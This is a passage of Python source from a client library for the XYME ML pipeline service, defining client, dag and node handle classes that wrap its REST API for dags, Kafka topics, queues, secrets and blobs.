"use retain_nonowned_blobs instead\n")
warnings_io.flush()
# FIXME: !!!xyme-backend bug!!!
copy_nonowned_blobs = not copy_nonowned_blobs
args = {
"dag": dag_uri,
"copy_nonowned_blobs": copy_nonowned_blobs,
}
if dest_uri is not None:
args["dest"] = dest_uri
return cast(DagDupResponse, self.request_json(
METHOD_POST, "/dag_dup", args))["dag"]
def set_dag(
self,
dag_uri: str,
defs: DagDef,
warnings_io: Optional[IO[Any]] = sys.stderr) -> 'DagHandle':
dag_create = cast(DagCreate, self.request_json(
METHOD_POST, "/dag_create", {
"dag": dag_uri,
"defs": defs,
}))
dag_uri = dag_create["dag"]
if warnings_io is not None:
warnings = dag_create["warnings"]
if len(warnings) > 1:
warnings_io.write(
f"{len(warnings)} warnings while "
f"setting dag {dag_uri}:\n")
elif len(warnings) == 1:
warnings_io.write(
f"Warning while setting dag {dag_uri}:\n")
for warn in warnings:
warnings_io.write(f"{warn}\n")
if warnings:
warnings_io.flush()
return self.get_dag(dag_uri)
def set_settings(
self, config_token: str, settings: SettingsObj) -> SettingsObj:
return cast(NamespaceUpdateSettings, self.request_json(
METHOD_POST, "/settings", {
"settings": settings,
"config_token": config_token,
}))["settings"]
def get_settings(self) -> SettingsObj:
return cast(NamespaceUpdateSettings, self.request_json(
METHOD_GET, "/settings", {}))["settings"]
def get_allowed_custom_imports(self) -> AllowedCustomImports:
return cast(AllowedCustomImports, self.request_json(
METHOD_GET, "/allowed_custom_imports", {}, add_namespace=False))
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
dag: Optional[str],
minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
dag: Optional[str],
minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
dag: Optional[str],
minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(
self,
dag: Optional[str] = None,
minimal: bool = False) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
if minimal:
return cast(MinimalQueueStatsResponse, self.request_json(
METHOD_GET, "/queue_stats", {
"dag": dag,
"minimal": True,
}))
return cast(QueueStatsResponse, self.request_json(
METHOD_GET, "/queue_stats", {
"dag": dag,
"minimal": False,
}))
def get_instance_status(
self,
dag_uri: Optional[str] = None,
node_id: Optional[str] = None) -> Dict[InstanceStatus, int]:
return cast(Dict[InstanceStatus, int], self.request_json(
METHOD_GET, "/instance_status", {
"dag": dag_uri,
"node": node_id,
}))
def get_queue_mode(self) -> str:
return cast(QueueMode, self.request_json(
METHOD_GET, "/queue_mode", {}, add_namespace=False))["mode"]
def set_queue_mode(self, mode: str) -> str:
return cast(QueueMode, self.request_json(
METHOD_PUT, "/queue_mode", {
"mode": mode,
}, add_namespace=False))["mode"]
def flush_all_queue_data(self) -> None:
def do_flush() -> bool:
res = cast(FlushAllQueuesResponse, self.request_json(
METHOD_POST, "/flush_all_queues", {}, add_namespace=False))
return bool(res["success"])
while do_flush(): # we flush until there is nothing to flush anymore
time.sleep(1.0)
def get_cache_stats(self) -> CacheStats:
return cast(CacheStats, self.request_json(
METHOD_GET, "/cache_stats", {}, add_namespace=False))
def reset_cache(self) -> CacheStats:
return cast(CacheStats, self.request_json(
METHOD_POST, "/cache_reset", {}, add_namespace=False))
def create_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self.request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 1,
}))
def get_kafka_error_topic(self) -> str:
res = cast(KafkaTopicNames, self.request_json(
METHOD_GET, "/kafka_topic_names", {}))["error"]
assert res is not None
return res
def delete_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self.request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 0,
}))
def read_kafka_errors(self, offset: str = "current") -> List[str]:
return cast(List[str], self.request_json(
METHOD_GET, "/kafka_msg", {
"offset": offset,
}))
def get_named_secrets(
self,
config_token: Optional[str] = None,
show_values: bool = False) -> Dict[str, Optional[str]]:
if show_values and config_token is None:
raise ValueError("config_token must be set to show_values")
return cast(Dict[str, Optional[str]], self.request_json(
METHOD_GET, "/named_secrets", {
"show": int(bool(show_values)),
"config_token": config_token,
}))
def set_named_secret(
self, config_token: str, key: str, value: str) -> bool:
return cast(SetNamedSecret, self.request_json(
METHOD_PUT, "/named_secrets", {
"key": key,
"value": value,
"config_token": config_token,
}))["replaced"]
def get_error_logs(self) -> str:
with self._raw_request_str(METHOD_GET, "/error_logs", {}) as fin:
return fin.read()
def get_known_blobs(
self,
blob_type: Optional[str] = None,
connector: Optional[str] = None) -> List[str]:
return [
res[0]
for res in self.get_known_blob_times(
retrieve_times=False,
blob_type=blob_type,
connector=connector)[1]
]
def get_known_blob_ages(
self,
blob_type: Optional[str] = None,
connector: Optional[str] = None) -> List[Tuple[str, str]]:
cur_time, blobs = self.get_known_blob_times(
retrieve_times=True, blob_type=blob_type, connector=connector)
return [
(blob_id, get_age(cur_time, blob_time))
for (blob_id, blob_time) in sorted(blobs, key=lambda el: (
safe_opt_num(el[1]), el[0]))
]
def get_known_blob_times(
self,
retrieve_times: bool,
blob_type: Optional[str] = None,
connector: Optional[str] = None,
) -> Tuple[float, List[Tuple[str, Optional[float]]]]:
obj: Dict[str, Union[int, str]] = {
"retrieve_times": int(retrieve_times),
}
if blob_type is not None:
obj["blob_type"] = blob_type
if connector is not None:
obj["connector"] = connector
res = cast(KnownBlobs, self.request_json(
METHOD_GET, "/known_blobs", obj))
return res["cur_time"], res["blobs"]
def get_triton_models(self) -> List[str]:
return cast(TritonModelsResponse, self.request_json(
METHOD_GET, "/inference_models", {}))["models"]
@staticmethod
def read_dvc(
path: str,
repo: str,
rev: Optional[str] = "HEAD",
warnings_io: Optional[IO[Any]] = sys.stderr) -> Any:
"""Reading dvc file content from git tracked DVC project.
Args:
path (str):
File path to read, relative to the root of the repo.
repo (str):
specifies the location of the DVC project. It can be a
github URL or a file system path.
rev (str):
Git commit (any revision such as a branch or tag name, or a
commit hash). If repo is not a Git repo, this option is
ignored. Default: HEAD.
warnings_io (optional IO):
IO stream where the warning will be printed to
Returns:
the content of the file.
"""
from .util import has_dvc
if not has_dvc():
if warnings_io is not None:
warnings_io.write(
"Please install dvc https://dvc.org/doc/install")
return None
import dvc.api
res = dvc.api.read(path, repo=repo, rev=rev, mode="r")
maybe_parse = maybe_json_loads(res)
if maybe_parse is not None:
return maybe_parse
return res
@staticmethod
def get_env_str(key: str, default: Optional[str] = None) -> str:
res = os.getenv(key, default=default)
if res is None:
raise ValueError(f"environment variable {key} is not set")
return f"{res}"
@staticmethod
def get_env_int(key: str, default: Optional[int] = None) -> int:
res = os.getenv(key, default=default)
if res is None:
raise ValueError(f"environment variable {key} is not set")
return int(res)
@staticmethod
def get_env_bool(key: str, default: Optional[bool] = None) -> bool:
res = os.getenv(key, default=default)
if res is None:
raise ValueError(f"environment variable {key} is not set")
return to_bool(res)
@staticmethod
def load_json(json_path: str) -> Dict[str, Any]:
with open(json_path, "r") as fin:
return json.load(fin)
@classmethod
def load_s3_config(cls, config_path: str) -> S3Config:
return cast(S3Config, cls.load_json(config_path))
@classmethod
def download_s3_from_file(
cls, dest_path: List[str], config_path: str) -> None:
cls.download_s3(dest_path, cls.load_s3_config(config_path))
@staticmethod
def download_s3(dest_path: List[str], config: S3Config) -> None:
import boto3
s3 = boto3.client(
"s3",
aws_access_key_id=config["accern_aws_key"],
aws_secret_access_key=config["accern_aws_access_key"])
assert len(dest_path) == len(config["model_download_path"])
for (dest, path) in zip(dest_path, config["model_download_path"]):
s3.download_file(config["model_download_bucket"], path, dest)
def get_uuid(self) -> str:
return cast(UUIDResponse, self.request_json(
METHOD_GET, "/uuid", {}))["uuid"]
def delete_blobs(self, blob_uris: List[str]) -> DeleteBlobResponse:
return cast(DeleteBlobResponse, self.request_json(
METHOD_DELETE, "/blob", {
"blob_uris": blob_uris,
},
))
# *** XYMEClient ***
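# Illustrative sketch (not part of the original library): connecting to a XYME
# deployment and inspecting a dag. The dag URI is hypothetical; when token is
# None the constructor falls back to the XYME_SERVER_TOKEN environment
# variable.
def _example_client_usage() -> None:
    client = XYMEClient(DEFAULT_URL, token=None, namespace=DEFAULT_NAMESPACE)
    print(client.get_dags())
    dag = client.get_dag("dag://example/dag")
    print(dag.get_nodes())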
class DagHandle:
def __init__(
self,
client: XYMEClient,
dag_uri: str) -> None:
self._client = client
self._dag_uri = dag_uri
self._name: Optional[str] = None
self._company: Optional[str] = None
self._state: Optional[str] = None
self._is_high_priority: Optional[bool] = None
self._queue_mng: Optional[str] = None
self._nodes: Dict[str, NodeHandle] = {}
self._node_lookup: Dict[str, str] = {}
self._dynamic_error: Optional[str] = None
self._ins: Optional[List[str]] = None
self._outs: Optional[List[Tuple[str, str]]] = None
def refresh(self) -> None:
self._name = None
self._company = None
self._state = None
self._is_high_priority = None
self._queue_mng = None
self._ins = None
self._outs = None
# NOTE: we don't reset nodes
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _maybe_fetch(self) -> None:
if self._name is None:
self._fetch_info()
def get_info(self) -> DagInfo:
return cast(DagInfo, self._client.request_json(
METHOD_GET, "/dag_info", {
"dag": self.get_uri(),
}))
def _fetch_info(self) -> None:
info = self.get_info()
self._name = info["name"]
self._company = info["company"]
self._state = info["state"]
self._is_high_priority = info["high_priority"]
self._queue_mng = info["queue_mng"]
self._ins = info["ins"]
self._outs = [(el[0], el[1]) for el in info["outs"]]
old_nodes = {} if self._nodes is None else self._nodes
self._nodes = {
node["id"]: NodeHandle.from_node_info(
self._client, self, node, old_nodes.get(node["id"]))
for node in info["nodes"]
}
self._node_lookup = {
node["name"]: node["id"]
for node in info["nodes"]
if node["name"] is not None
}
def get_nodes(self) -> List[str]:
self._maybe_refresh()
self._maybe_fetch()
return list(self._nodes.keys())
def get_node(self, node_name: str) -> 'NodeHandle':
self._maybe_refresh()
self._maybe_fetch()
node_id = self._node_lookup.get(node_name, node_name)
return self._nodes[node_id]
def get_uri(self) -> str:
return self._dag_uri
def get_name(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._name is not None
return self._name
def get_company(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._company is not None
return self._company
def get_state_type(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._state is not None
return self._state
def get_timing(
self,
blacklist: Optional[List[str]] = None,
) -> TimingResult:
blist = [] if blacklist is None else blacklist
node_timing: Dict[str, NodeTiming] = {}
nodes = self.get_nodes()
def get_filtered_times(
node_time: List[Timing]) -> Tuple[float, float, List[Timing]]:
fns = []
node_total = 0.0
for value in node_time:
if value["name"] not in blist:
fns.append(value)
node_total += value["total"]
if not fns:
return (0, 0, fns)
return (node_total, node_total / len(fns), fns)
dag_total = 0.0
for node in nodes:
node_get = self.get_node(node)
node_time = node_get.get_timing()
node_name = node_get.get_node_def()["name"]
node_id = node_get.get_id()
node_total, avg_time, fns = get_filtered_times(node_time)
node_timing[node_id] = {
"node_name": node_name,
"node_total": node_total,
"node_avg": avg_time,
"fns": fns,
}
dag_total += node_total
node_timing_sorted = sorted(
node_timing.items(),
key=lambda x: x[1]["node_total"],
reverse=True)
return {
"dag_total": dag_total,
"nodes": node_timing_sorted,
}
def is_high_priority(self) -> bool:
self._maybe_refresh()
self._maybe_fetch()
assert self._is_high_priority is not None
return self._is_high_priority
def is_queue(self) -> bool:
self._maybe_refresh()
self._maybe_fetch()
return self._queue_mng is not None
def get_queue_mng(self) -> Optional[str]:
self._maybe_refresh()
self._maybe_fetch()
return self._queue_mng
def get_ins(self) -> List[str]:
self._maybe_refresh()
self._maybe_fetch()
assert self._ins is not None
return self._ins
def get_outs(self) -> List[Tuple[str, str]]:
self._maybe_refresh()
self._maybe_fetch()
assert self._outs is not None
return self._outs
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def set_dag(self, defs: DagDef) -> None:
self._client.set_dag(self.get_uri(), defs)
def dynamic_model(
self,
inputs: List[Any],
format_method: str = "simple",
no_cache: bool = False) -> List[Any]:
res = cast(DynamicResults, self._client.request_json(
METHOD_POST, "/dynamic_model", {
"format": format_method,
"inputs": inputs,
"no_cache": no_cache,
"dag": self.get_uri(),
}))
return res["results"]
def dynamic_list(
self,
inputs: List[Any],
input_key: Optional[str] = None,
output_key: Optional[str] = None,
split_th: Optional[int] = 1000,
max_threads: int = 50,
format_method: str = "simple",
force_keys: bool = False,
no_cache: bool = False) -> List[Any]:
if split_th is None or len(inputs) <= split_th:
res = cast(DynamicResults, self._client.request_json(
METHOD_POST, "/dynamic_list", {
"force_keys": force_keys,
"format": format_method,
"input_key": input_key,
"inputs": inputs,
"no_cache": no_cache,
"output_key": output_key,
"dag": self.get_uri(),
}))
return res["results"]
# FIXME: write generic spliterator implementation
split_num: int = split_th
assert split_num > 0
res_arr: List[Any] = [None] * len(inputs)
exc: List[Optional[BaseException]] = [None]
active_ths: Set[threading.Thread] = set()
def compute_half(cur: List[Any], offset: int) -> None:
if exc[0] is not None:
return
if len(cur) <= split_num:
try:
cur_res = self.dynamic_list(
cur,
input_key=input_key,
output_key=output_key,
split_th=None,
max_threads=max_threads,
format_method=format_method,
force_keys=force_keys,
no_cache=no_cache)
res_arr[offset:offset + len(cur_res)] = cur_res
except BaseException as e: # pylint: disable=broad-except
exc[0] = e
return
half_ix: int = len(cur) // 2
args_first = (cur[:half_ix], offset)
args_second = (cur[half_ix:], offset + half_ix)
if len(active_ths) < max_threads:
comp_th = threading.Thread(
target=compute_half, args=args_first)
active_ths.add(comp_th)
comp_th.start()
compute_half(*args_second)
comp_th.join()
active_ths.remove(comp_th)
else:
compute_half(*args_first)
compute_half(*args_second)
compute_half(inputs, 0)
for remain_th in active_ths:
remain_th.join()
raise_e = exc[0]
try:
if isinstance(raise_e, BaseException):
raise raise_e # pylint: disable=raising-bad-type
except RequestException as e:
raise ValueError(
"request error while processing. processing time per batch "
"might be too large. try reducing split_th") from e
return res_arr
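# --- Usage sketch (editor's note) ---
# dynamic_list splits a large batch into chunks of at most split_th inputs and
# fans the chunks out over up to max_threads threads; split_th=None sends a
# single request. The inputs below are placeholders:
#
#     results = dag.dynamic_list(
#         [{"text": text} for text in texts],
#         split_th=500,
#         max_threads=16)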
def dynamic(self, input_data: BytesIO) -> ByteResponse:
cur_res, ctype = self._client.request_bytes(
METHOD_FILE, "/dynamic", {
"dag": self.get_uri(),
}, files={
"file": input_data,
})
return interpret_ctype(cur_res, ctype)
def dynamic_obj(self, input_obj: Any) -> ByteResponse:
bio = BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
return self.dynamic(bio)
def dynamic_async(
self, input_data: List[BytesIO]) -> List['ComputationHandle']:
names = [f"file{pos}" for pos in range(len(input_data))]
res: Dict[str, str] = self._client.request_json(
METHOD_FILE, "/dynamic_async", {
"dag": self.get_uri(),
}, files=dict(zip(names, input_data)))
return [
ComputationHandle(
self,
res[name],
self.get_dynamic_error_message,
self.set_dynamic_error_message)
for name in names]
def set_dynamic_error_message(self, msg: Optional[str]) -> None:
self._dynamic_error = msg
def get_dynamic_error_message(self) -> Optional[str]:
return self._dynamic_error
def dynamic_async_obj(
self, input_data: List[Any]) -> List['ComputationHandle']:
return self.dynamic_async([
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_data
])
def get_dynamic_result(self, value_id: str) -> ByteResponse:
try:
cur_res, ctype = self._client.request_bytes(
METHOD_GET, "/dynamic_result", {
"dag": self.get_uri(),
"id": value_id,
})
except HTTPError as e:
if e.response.status_code == 404:
raise KeyError(f"value_id {value_id} does not exist") from e
raise e
return interpret_ctype(cur_res, ctype)
def get_dynamic_status(
self,
value_ids: List['ComputationHandle']) -> Dict[
'ComputationHandle', QueueStatus]:
res = cast(DynamicStatusResponse, self._client.request_json(
METHOD_POST, "/dynamic_status", {
"value_ids": [value_id.get_id() for value_id in value_ids],
"dag": self.get_uri(),
}))
status = res["status"]
hnd_map = {value_id.get_id(): value_id for value_id in value_ids}
return {
hnd_map[key]: cast(QueueStatus, value)
for key, value in status.items()
}
def get_dynamic_bulk(
self,
input_data: List[BytesIO],
max_buff: int = 4000,
block_size: int = 5,
num_threads: int = 20) -> Iterable[ByteResponse]:
def get(hnd: 'ComputationHandle') -> ByteResponse:
return hnd.get()
success = False
try:
yield from async_compute(
input_data,
self.dynamic_async,
get,
lambda: self.check_queue_stats(minimal=True),
self.get_dynamic_status,
max_buff,
block_size,
num_threads)
success = True
finally:
if success:
self.set_dynamic_error_message(None)
def get_dynamic_bulk_obj(
self,
input_data: List[Any],
max_buff: int = 4000,
block_size: int = 5,
num_threads: int = 20) -> Iterable[ByteResponse]:
def get(hnd: 'ComputationHandle') -> ByteResponse:
return hnd.get()
success = False
try:
yield from async_compute(
input_data,
self.dynamic_async_obj,
get,
lambda: self.check_queue_stats(minimal=True),
self.get_dynamic_status,
max_buff,
block_size,
num_threads)
success = True
finally:
if success:
self.set_dynamic_error_message(None)
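# --- Usage sketch (editor's note) ---
# The bulk helpers stream results back as computations finish instead of
# collecting everything first. The payloads and the handle_result callback are
# placeholders:
#
#     for res in dag.get_dynamic_bulk_obj(
#             [{"row": ix} for ix in range(10000)],
#             max_buff=4000,
#             block_size=5,
#             num_threads=20):
#         handle_result(res)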
def _pretty(
self,
nodes_only: bool,
allow_unicode: bool,
method: Optional[str] = "accern",
fields: Optional[List[str]] = None) -> PrettyResponse:
args = {
"dag": self.get_uri(),
"nodes_only": nodes_only,
"allow_unicode": allow_unicode,
"method": method,
}
if fields is not None:
args["fields"] = ",".join(fields)
return cast(PrettyResponse, self._client.request_json(
METHOD_GET, "/pretty", args))
def pretty(
self,
nodes_only: bool = False,
allow_unicode: bool = True,
method: Optional[str] = "dot",
fields: Optional[List[str]] = None,
output_format: Optional[str] = "png",
display: Optional[IO[Any]] = sys.stdout) -> Optional[str]:
def render(value: str) -> Optional[str]:
if display is not None:
display.write(value)
display.flush()
return None
return value
graph_str = self._pretty(
nodes_only=nodes_only,
allow_unicode=allow_unicode,
method=method,
fields=fields)["pretty"]
if method == "accern":
return render(graph_str)
if method == "dot":
try:
from graphviz import Source
graph = Source(graph_str)
if output_format == "dot":
return render(graph_str)
if output_format == "svg":
svg_str = graph.pipe(format="svg")
if display is not None:
if not is_jupyter():
display.write(
"Warning: Ipython instance not found.\n")
display.write(svg_str)
display.flush()
else:
from IPython.display import display as idisplay
from IPython.display import SVG
idisplay(SVG(svg_str))
return None
return svg_str
if output_format == "png":
graph = Source(graph_str)
png_str = graph.pipe(format="png")
if display is not None:
if not is_jupyter():
display.write(
"Warning: Ipython instance not found.\n")
display.write(png_str)
display.flush()
else:
from IPython.display import display as idisplay
from IPython.display import Image
idisplay(Image(png_str))
return None
return png_str
if output_format == "ascii":
if not has_graph_easy():
return render(graph_str)
import subprocess
cmd = ["echo", graph_str]
p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE)
p2 = subprocess.check_output(
["graph-easy"], stdin=p1.stdout)
res = p2.decode("utf-8")
return render(res)
raise ValueError(
f"invalid format {output_format}, "
"use svg, png, ascii, or dot")
except ExecutableNotFound as e:
raise RuntimeError(
"use 'brew install graphviz' or use 'method=accern'",
) from e
raise ValueError(
f"invalid method {method}, use accern or dot")
def pretty_obj(
self,
nodes_only: bool = False,
allow_unicode: bool = True,
fields: Optional[List[str]] = None) -> List[DagPrettyNode]:
return self._pretty(
nodes_only=nodes_only,
allow_unicode=allow_unicode,
fields=fields)["nodes"]
def get_def(self, full: bool = True) -> DagDef:
return cast(DagDef, self._client.request_json(
METHOD_GET, "/dag_def", {
"dag": self.get_uri(),
"full": full,
}))
def set_attr(self, attr: str, value: Any) -> None:
dag_def = self.get_def()
dag_def[attr] = value # type: ignore
self._client.set_dag(self.get_uri(), dag_def)
def set_name(self, value: str) -> None:
self.set_attr("name", value)
def set_company(self, value: str) -> None:
self.set_attr("company", value)
def set_state(self, value: str) -> None:
self.set_attr("state", value)
def set_high_priority(self, value: bool) -> None:
self.set_attr("high_priority", value)
def set_queue_mng(self, value: Optional[str]) -> None:
self.set_attr("queue_mng", value)
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(self, minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
return self._client.check_queue_stats(self.get_uri(), minimal=minimal)
def scale_worker(self, replicas: int) -> int:
return cast(WorkerScale, self._client.request_json(
METHOD_PUT, "/worker", {
"dag": self.get_uri(),
"replicas": replicas,
"task": None,
}))["num_replicas"]
def reload(self, timestamp: Optional[float] = None) -> float:
return cast(DagReload, self._client.request_json(
METHOD_PUT, "/dag_reload", {
"dag": self.get_uri(),
"when": timestamp,
}))["when"]
def get_kafka_input_topic(self, postfix: str = "") -> str:
res = cast(KafkaTopicNames, self._client.request_json(
METHOD_GET, "/kafka_topic_names", {
"dag": self.get_uri(),
"postfix": postfix,
"no_output": True,
}))["input"]
assert res is not None
return res
def get_kafka_output_topic(self) -> str:
res = cast(KafkaTopicNames, self._client.request_json(
METHOD_GET, "/kafka_topic_names", {
"dag": self.get_uri(),
}))["output"]
assert res is not None
return res
def set_kafka_topic_partitions(
self,
num_partitions: int,
postfix: str = "",
large_input_retention: bool = False,
no_output: bool = False) -> KafkaTopics:
return cast(KafkaTopics, self._client.request_json(
METHOD_POST, "/kafka_topics", {
"dag": self.get_uri(),
"num_partitions": num_partitions,
"postfix": postfix,
"large_input_retention": large_input_retention,
"no_output": no_output,
}))
def post_kafka_objs(self, input_objs: List[Any]) -> List[str]:
bios = [
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_objs
]
return self.post_kafka_msgs(bios)
def post_kafka_msgs(
self,
input_data: List[BytesIO],
postfix: str = "") -> List[str]:
names = [f"file{pos}" for pos in range(len(input_data))]
res = cast(KafkaMessage, self._client.request_json(
METHOD_FILE, "/kafka_msg", {
"dag": self.get_uri(),
"postfix": postfix,
}, files=dict(zip(names, input_data))))
msgs = res["messages"]
return [msgs[key] for key in names]
def read_kafka_output(
self,
offset: str = "current",
max_rows: int = 100) -> Optional[ByteResponse]:
offset_str = [offset]
def read_single() -> Tuple[ByteResponse, str]:
cur, read_ctype = self._client.request_bytes(
METHOD_GET, "/kafka_msg", {
"dag": self.get_uri(),
"offset": offset_str[0],
})
offset_str[0] = "current"
return interpret_ctype(cur, read_ctype), read_ctype
if max_rows <= 1:
return read_single()[0]
res: List[ByteResponse] = []
ctype: Optional[str] = None
while True:
val, cur_ctype = read_single()
if val is None:
break
if ctype is None:
ctype = cur_ctype
elif ctype != cur_ctype:
raise ValueError(
f"inconsistent return types {ctype} != {cur_ctype}")
res.append(val)
if len(res) >= max_rows:
break
if not res or ctype is None:
return None
return merge_ctype(res, ctype)
def get_kafka_offsets(
self, alive: bool, postfix: Optional[str] = None) -> KafkaOffsets:
args = {
"dag": self.get_uri(),
"alive": int(alive),
}
if postfix is not None:
args["postfix"] = postfix
return cast(KafkaOffsets, self._client.request_json(
METHOD_GET, "/kafka_offsets", args))
def get_kafka_throughput(
self,
postfix: Optional[str] = None,
segment_interval: float = 120.0,
segments: int = 5) -> KafkaThroughput:
assert segments > 0
assert segment_interval > 0.0
offsets = self.get_kafka_offsets(postfix=postfix, alive=False)
now = time.monotonic()
measurements: List[Tuple[int, int, int, float]] = [(
offsets["input"],
offsets["output"],
offsets["error"],
now,
)]
for _ in range(segments):
prev = now
while now - prev < segment_interval:
time.sleep(max(0.0, segment_interval - (now - prev)))
now = time.monotonic()
offsets = self.get_kafka_offsets(postfix=postfix, alive=False)
measurements.append((
offsets["input"],
offsets["output"],
offsets["error"],
now,
))
first = measurements[0]
last = measurements[-1]
total_input = last[0] - first[0]
total_output = last[1] - first[1]
errors = last[2] - first[2]
total = last[3] - first[3]
input_segments: List[float] = []
output_segments: List[float] = []
cur_input = first[0]
cur_output = first[1]
cur_time = first[3]
for (next_input, next_output, _, next_time) in measurements[1:]:
seg_time = next_time - cur_time
input_segments.append((next_input - cur_input) / seg_time)
output_segments.append((next_output - cur_output) / seg_time)
cur_input = next_input
cur_output = next_output
cur_time = next_time
inputs = pd.Series(input_segments)
outputs = pd.Series(output_segments)
return {
"dag": self.get_uri(),
"input": {
"throughput": total_input / total,
"max": inputs.max(),
"min": inputs.min(),
"stddev": inputs.std(),
"segments": segments,
"count": total_input,
"total": total,
},
"output": {
"throughput": total_output / total,
"max": outputs.max(),
"min": outputs.min(),
"stddev": outputs.std(),
"segments": segments,
"count": total_output,
"total": total,
},
"faster": "both" if total_input == total_output else (
"input" if total_input > total_output else "output"),
"errors": errors,
}
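# --- Usage sketch (editor's note) ---
# get_kafka_throughput samples the topic offsets (five segments of 120 seconds
# by default) and reports per-direction rates:
#
#     stats = dag.get_kafka_throughput()
#     print(stats["input"]["throughput"], stats["output"]["throughput"])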
def get_kafka_group(self) -> KafkaGroup:
return cast(KafkaGroup, self._client.request_json(
METHOD_GET, "/kafka_group", {
"dag": self.get_uri(),
}))
def set_kafka_group(
self,
group_id: Optional[str] = None,
reset: Optional[str] = None,
**kwargs: Any) -> KafkaGroup:
return cast(KafkaGroup, self._client.request_json(
METHOD_PUT, "/kafka_group", {
"dag": self.get_uri(),
"group_id": group_id,
"reset": reset,
**kwargs,
}))
def delete(self) -> DeleteBlobResponse:
return cast(DeleteBlobResponse, self._client.request_json(
METHOD_DELETE, "/blob", {
"blob_uris": [self.get_uri()],
},
))
def __hash__(self) -> int:
return hash(self.get_uri())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_uri() == other.get_uri()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.get_uri()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.get_uri()}]"
# *** DagHandle ***
class NodeHandle:
def __init__(
self,
client: XYMEClient,
dag: DagHandle,
node_id: str,
node_name: str,
kind: str) -> None:
self._client = client
self._dag = dag
self._node_id = node_id
self._node_name = node_name
self._type = kind
self._blobs: Dict[str, BlobHandle] = {}
self._inputs: Dict[str, Tuple[str, str]] = {}
self._state: Optional[int] = None
self._config_error: Optional[str] = None
self._is_model: Optional[bool] = None
def as_owner(self) -> BlobOwner:
return {
"owner_dag": self.get_dag().get_uri(),
"owner_node": self.get_id(),
}
@staticmethod
def from_node_info(
client: XYMEClient,
dag: DagHandle,
node_info: NodeInfo,
prev: Optional['NodeHandle']) -> 'NodeHandle':
if prev is None:
res = NodeHandle(
client,
dag,
node_info["id"],
node_info["name"],
node_info["type"])
else:
if prev.get_dag() != dag:
raise ValueError(f"{prev.get_dag()} != {dag}")
res = prev
res.update_info(node_info)
return res
def update_info(self, node_info: NodeInfo) -> None:
if self.get_id() != node_info["id"]:
raise ValueError(f"{self._node_id} != {node_info['id']}")
self._node_name = node_info["name"]
self._type = node_info["type"]
self._blobs = {
key: BlobHandle(self._client, value, is_full=False)
for (key, value) in node_info["blobs"].items()
}
self._inputs = node_info["inputs"]
self._state = node_info["state"]
self._config_error = node_info["config_error"]
def get_dag(self) -> DagHandle:
return self._dag
def get_id(self) -> str:
return self._node_id
def get_name(self) -> str:
return self._node_name
def get_type(self) -> str:
return self._type
def get_node_def(self) -> NodeDefInfo:
return self._client.get_node_defs()[self.get_type()]
def get_inputs(self) -> Set[str]:
return set(self._inputs.keys())
def get_input(self, key: str) -> Tuple['NodeHandle', str]:
node_id, out_key = self._inputs[key]
return self.get_dag().get_node(node_id), out_key
def get_status(self) -> TaskStatus:
return cast(NodeStatus, self._client.request_json(
METHOD_GET, "/node_status", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["status"]
def has_config_error(self) -> bool:
return self._config_error is not None
def get_config_error(self) -> Optional[str]:
return self._config_error
def get_blobs(self) -> List[str]:
return sorted(self._blobs.keys())
def get_blob_handles(self) -> Dict[str, 'BlobHandle']:
return self._blobs
def get_blob_handle(self, key: str) -> 'BlobHandle':
return self._blobs[key]
def set_blob_uri(self, key: str, blob_uri: str) -> str:
return cast(PutNodeBlob, self._client.request_json(
METHOD_PUT, "/node_blob", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"blob_key": key,
"blob_uri": blob_uri,
}))["new_uri"]
def get_in_cursor_states(self) -> Dict[str, int]:
return cast(InCursors, self._client.request_json(
METHOD_GET, "/node_in_cursors", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["cursors"]
def get_highest_chunk(self) -> int:
return cast(NodeChunk, self._client.request_json(
METHOD_GET, "/node_chunk", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["chunk"]
def get_short_status(self, allow_unicode: bool = True) -> str:
status_map: Dict[TaskStatus, str] = {
"blocked": "B",
"waiting": "W",
"running": "→" if allow_unicode else "R",
"complete": "✓" if allow_unicode else "C",
"eos": "X",
"paused": "P",
"error": "!",
"unknown": "?",
"virtual": "∴" if allow_unicode else "V",
"queue": "=",
}
return status_map[self.get_status()]
def get_logs(self) -> str:
with self._client._raw_request_str(
METHOD_GET, "/node_logs", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}) as fin:
return fin.read()
def get_timing(self) -> List[Timing]:
